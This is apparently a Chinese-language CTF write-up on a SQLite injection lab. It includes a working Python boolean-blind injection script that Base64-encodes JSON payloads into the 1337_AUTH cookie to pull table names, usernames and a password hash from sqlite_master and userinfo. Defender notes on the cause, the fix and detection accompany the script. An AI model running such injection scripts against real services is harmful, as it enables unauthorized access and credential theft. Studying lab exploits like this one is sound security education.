sqlite注入
对登录接口进行爆破,得到用户名和密码:guest / guest
然后纠结了一会儿,在cookie中发现了
eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9
这样的字符串,Base64 解码(只是编码,不是加密)后得到
{"username":"guest","password":"guest"}
猜测 cookie 处存在注入:cookie 只是 Base64 编码的 JSON,没有签名或完整性校验,内容完全由客户端控制,服务端很可能把其中的字段直接拼进了 SQL 语句。
import requests
import base64
import string
# Boolean-based blind extraction through the 1337_AUTH cookie of a CTF lab
# instance. The cookie is plain Base64-encoded JSON; the script replaces the
# "username" field with a LIKE-prefix probe and treats a response containing
# "Movie" as "condition true", growing the recovered value one character at a
# time.
#
# Defender notes:
#   * Root cause (as far as the responses show): the decoded cookie field is
#     concatenated into a SQL string. Bind it as a query parameter instead.
#   * Credentials should not live in a client-side cookie at all; use an
#     opaque, server-side session id or a signed/MAC'd token.
#   * Detection: a single client sending many requests whose auth cookie
#     differs by one trailing character, with SQL keywords visible after
#     Base64-decoding the cookie.
flag = ""
url='http://2d906c68-d6cd-4d37-9337-bd49f2852627.node3.buuoj.cn/sequels'

# Active probe: password column of userinfo. "{}" receives the guessed prefix
# followed by the LIKE wildcard.
probe_template = r'{{"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"{}\") OR \"","password":"guest"}}'

for _ in range(50):
    for ch in string.printable:
        tmp = flag + ch

        # --- disabled stage: table names ---
        # if j == 'n': continue
        # if j == 'r': continue
        # if j == 's': continue
        # payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # table_name notes,reviews,sqlite,uSeRiNfo

        # --- disabled stage: usernames ---
        # if j == 'g': continue
        # payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # username guest,sequeladmin

        # --- active stage: password ---
        payload = probe_template.format(tmp + '%')
        # password f5ec3af19f0d3679e7d5a148f4ac323d

        # The server expects the cookie Base64-encoded, exactly like the
        # original guest cookie.
        raw_cookie = payload.encode('utf-8')
        payload = base64.b64encode(raw_cookie).decode('utf-8')
        resp = requests.get(url, cookies={"1337_AUTH" : payload})

        # No "Movie" marker: the probe was false for this character.
        if "Movie" not in resp.text:
            continue

        flag = tmp
        print(flag)
        break
用注入得到的账号和密码登录,即可拿到 flag。
sqlite_master 的结构如下(注释针对 type 为 table 的行):
-- Built-in schema table that SQLite keeps in every database file: one row per
-- table, index, view and trigger. It can be read with an ordinary SELECT, so
-- any injectable query exposes the whole schema; parameterized queries are the
-- fix, not hiding table names.
CREATE TABLE sqlite_master (
  type TEXT,        -- object kind; 'table' for a table row (also 'index', 'view', 'trigger')
  name TEXT,        -- object name; for a table row, the table name
  tbl_name TEXT,    -- table the object belongs to; equals name for a table row
  rootpage INTEGER, -- page number of the object's root b-tree page in the database file
  sql TEXT          -- text of the CREATE statement that defined the object
);